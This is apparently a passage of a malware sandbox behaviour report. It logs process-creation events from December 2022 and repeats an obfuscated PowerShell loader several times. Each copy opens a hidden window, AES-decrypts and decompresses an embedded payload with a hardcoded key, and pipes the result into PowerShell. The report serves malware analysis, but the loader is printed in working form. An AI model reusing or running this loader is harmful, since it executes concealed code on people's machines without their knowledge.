HteI35KlQmJaJk2yyzFpUrhTHSFCQh5y+XsNyQIOu1df5Bda5MftCTfCzyMymgf4rWcRAAhcKK0Wpe1SfZdauhXiZii687s3h7ygKk7esavBZcjNkMl104eSdAotnweMudkTI5iOvC2smkyMkMaVwUeqtb5+WFt/7ECUQTy+uViQCWuP5B4ILj58zFfXle1ltfAP7xiWtMtTKm8ejx0JsqE4P67052h9Ig4xR5UBv6JpkaSodzJjkY1CsPUo1Hzz645K4Yi85OjSDQyF3lDbP9K5N750GlaZC0pTrIrCh2uipFUMZEh71ELkBZp6D2pS+QyShaVfWnCMcY1adRfsFvhCL0RS48BOR2q/QjeiueSXcKTRf2BHQGMY/FUjWkSE7JBsEGNMgmABJWkj4nPCQ3sXe80jeVI7JW/XuCIzlRi35rVDpBIcAAvQKPgI6A+dqNZu+kPeOKFpRa1tKdtm/uHOkdVB9nrXdK90ptyHu2lI4k4PYgbZ6DhMZeQ5ofYqL/qPB3WPIz1qyS9MyrnDX+Pk13J+A/7/EtXZSBpK4tX7bX+nyDuOzqfwNPN+rUmAsisSLpVAxhBjTpUFcYo+/csQtelvOeu1dulGj36t9ZvXj2r9dNwEL0bWlglPeIawQsirYkh2NdPo690IdZHdd8zJZZLtSXw9c+Hill+FqhN1dRqI4tW+AV5FbnI546YGl9DWX9aQSwt6lEgsFee81oYAkYlGCYQXerJJ2VsD3uORrgt+NXHFUVO88mH4vdxy68ml9jmY68KB9ktbtRvCpAglahhY3+WcRLsXtuGvziHH814XK8+PMPcEVxA5OqH5vjnlYO0ST86E+uZNTC/4PrHITnc53gcifABKNJXq4LpvHiySAsbripkHX+Qj5j8ydbVmDeKu/++vRoKaL+W+zHuXUDVT+1dJygSKATg6sUUS7TpSMvftEBHE/+/zWbQexdtVBEVldJm46B4yIWL2pdA0U3JzNFORi5FdCC0fJwAQe3sHK4HxfWiCCV6egc5DxMQJEh8QN0K4NumNvg2G8/ytvqjqVHfKHWGkabTQql/9ZiWOPieDLpy9El/Y4YSxaJ8GRWGsVpdkDXFm16RkQhUCwD5BcQjt1GR4il1Is9aseJDcP6QdLzBXqaeeD0tZiL5SshOBXe8Vd6wKACSCBcmjE2534LfzCC6xSQwrr2iFhl29lXWd9MSktqtMef054DZ/J/L56sfmgWVwell7hqabtGWUZtx882ocnIyDLYKAVx97i217JG5BrrSq8KFY3V7Wi90naSw4V3QtKW2GZkQ7K5NpZ6L4DOq788OtzmO3/5DYzfoKFoZjvmuMDPjuvAPplz8v7HZ8m0L3AaC/XKd+uSrhyi7PzTLmxdG1rcjSPygCSBZgHAAX0gOmp1sfU470dA6wUU8grg/T35NwFuKqjsUVWoOuNB38nJyoCMLnC5PUjaySa2D2t+2XJV41g1wMRoUXkxpZyB9rwXttNNhohx/GIf70kCsJgpPg7v1+dl95wsSd3X/zaJdSyIzNzmAdhCvdIboT1xHYg2I3Iip+l6spO45cRmqdTXrXo57UTKTMq6k737C8bI++FclfRFlzYZCh5DzHa5VwTMvVTEg+97q7qAiOHHL/vhR6D6CjcBoKY/OshdEe8KJB07bjtLfzpKX+fKYXBli82pSc0tBd14PkMonKDWYyhdgep+ppaQvrZuOaH/fMZoodM5+JIwftgcJoItnbbJ2Gum7mCMLjE';$ynfvCucL = 'R0piaVFud0pweHlla0R6cHVqcEV5QnpobmZYdkV5UGg=';$wHuBLdg = New-Object 'System.Security.Cryptography.AesManaged';$wHuBLdg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$wHuBLdg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$wHuBLdg.BlockSize = 128;$wHuBLdg.KeySize = 256;$wHuBLdg.Key = [System.Convert]::FromBase64String($ynfvCucL);$VaVjY = [System.Convert]::FromBase64String($Ibhr);$rXaMmEYL = $VaVjY[0..15];$wHuBLdg.IV = $rXaMmEYL;$oiEgKgyJf = $wHuBLdg.CreateDecryptor();$SxPDGLzVD = $oiEgKgyJf.TransformFinalBlock($VaVjY, 16, $VaVjY.Length - 16);$wHuBLdg.Dispose();$BiPumZcr = New-Object System.IO.MemoryStream( , $SxPDGLzVD );$NxNSfxy = New-Object System.IO.MemoryStream;$JeEsnJwpr = New-Object System.IO.Compression.GzipStream $BiPumZcr, ([IO.Compression.CompressionMode]::Decompress);$JeEsnJwpr.CopyTo( $NxNSfxy );$JeEsnJwpr.Close();$BiPumZcr.Close();[byte[]] $PiONcl = $NxNSfxy.ToArray();$Larju = [System.Text.Encoding]::UTF8.GetString($PiONcl);$Larju \| powershell -

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Dec. 7, 2022, 9:45 a.m.	thread_identifier: 2224 thread_handle: 0x00000360 process_identifier: 1784 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $Ibhr = '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';$ynfvCucL = 'R0piaVFud0pweHlla0R6cHVqcEV5QnpobmZYdkV5UGg=';$wHuBLdg = New-Object 'System.Security.Cryptography.AesManaged';$wHuBLdg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$wHuBLdg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$wHuBLdg.BlockSize = 128;$wHuBLdg.KeySize = 256;$wHuBLdg.Key = [System.Convert]::FromBase64String($ynfvCucL);$VaVjY = [System.Convert]::FromBase64String($Ibhr);$rXaMmEYL = $VaVjY[0..15];$wHuBLdg.IV = $rXaMmEYL;$oiEgKgyJf = $wHuBLdg.CreateDecryptor();$SxPDGLzVD = $oiEgKgyJf.TransformFinalBlock($VaVjY, 16, $VaVjY.Length - 16);$wHuBLdg.Dispose();$BiPumZcr = New-Object System.IO.MemoryStream( , $SxPDGLzVD );$NxNSfxy = New-Object System.IO.MemoryStream;$JeEsnJwpr = New-Object System.IO.Compression.GzipStream $BiPumZcr, ([IO.Compression.CompressionMode]::Decompress);$JeEsnJwpr.CopyTo( $NxNSfxy );$JeEsnJwpr.Close();$BiPumZcr.Close();[byte[]] $PiONcl = $NxNSfxy.ToArray();$Larju = [System.Text.Encoding]::UTF8.GetString($PiONcl);$Larju \| powershell - } filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000036c	1	1
ShellExecuteExW Dec. 7, 2022, 9:45 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $Ibhr = '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';$ynfvCucL = 'R0piaVFud0pweHlla0R6cHVqcEV5QnpobmZYdkV5UGg=';$wHuBLdg = New-Object 'System.Security.Cryptography.AesManaged';$wHuBLdg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$wHuBLdg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$wHuBLdg.BlockSize = 128;$wHuBLdg.KeySize = 256;$wHuBLdg.Key = [System.Convert]::FromBase64String($ynfvCucL);$VaVjY = [System.Convert]::FromBase64String($Ibhr);$rXaMmEYL = $VaVjY[0..15];$wHuBLdg.IV = $rXaMmEYL;$oiEgKgyJf = $wHuBLdg.CreateDecryptor();$SxPDGLzVD = $oiEgKgyJf.TransformFinalBlock($VaVjY, 16, $VaVjY.Length - 16);$wHuBLdg.Dispose();$BiPumZcr = New-Object System.IO.MemoryStream( , $SxPDGLzVD );$NxNSfxy = New-Object System.IO.MemoryStream;$JeEsnJwpr = New-Object System.IO.Compression.GzipStream $BiPumZcr, ([IO.Compression.CompressionMode]::Decompress);$JeEsnJwpr.CopyTo( $NxNSfxy );$JeEsnJwpr.Close();$BiPumZcr.Close();[byte[]] $PiONcl = $NxNSfxy.ToArray();$Larju = [System.Text.Encoding]::UTF8.GetString($PiONcl);$Larju \| powershell - } filepath: powershell.exe	1	1
ShellExecuteExW Dec. 7, 2022, 9:45 a.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c powershell.exe $Ibhr = 'AAAAAAAAAAAAAAAAAAAAAJNLwVViKLkEyLezDfy1u8Lxa4o0JNZRu1et2uMAay7eJ+8JTeudtHkgrU6+WRmca6O5BdHdgpfHwwAnIeTItnzi9d8fQV6SodpWWGtbNPnFHvaSRPZC2hQMRXpxRdAl7MM/9DA84eI2oVNAsWhBQ3Z9ppyurDuB1RIOBL0HHtLUc9TCaMkRMYnQgDZRs9jLzVQD0axM/vr0+DhCwMnW083dxECzaqkLkbnkPasKnqwgVZAFt047JZi4QgdNTutgRyXdbXgg/BEJ2cBgRMJhOvC73u2ASo1NdtSNNu51zGrJe7INItN4UapIT0CoqCOQvb2IGsLoOB9CzmrUOJoEiSrR76U5LhfVlev7maNn+EVy4EFw/Kfa3TDgSerXMhRYWo6lYp5tDrInObJ2YWOqylkcR/JqJBtTRFviTiiCL1IpCyBcblRqKzbIdGn1XozlyMxld62IKea7/nlviUtLLO/Y7+IboIr8EtP0mkW4nF6/fXlO0qevGEdHAhWgyYN0JpwjDOYNSWdokkA8gLOFBPFVeB2sDWZbmCNxFoUIZVl2wH/w8McKW4u2rIa9hVkeH9Eu4QKm5riFDLmgBM7WavM9/nKBQXjrkE1i93tzfoQ1t25P/3w5zx4LNU0I8ERnfc91wwtJ4E3fGyaG9+Vjsa5JMNFs368BNd9dA31nq36JSm7edVQvkyIJ6PGNyp42GO9F2SSJd